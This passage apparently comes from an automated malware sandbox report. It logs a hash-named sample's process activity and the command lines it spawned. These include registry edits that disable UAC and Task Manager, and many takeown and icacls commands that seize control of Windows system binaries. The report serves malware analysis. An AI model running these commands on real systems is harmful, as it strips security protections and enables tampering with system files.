PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

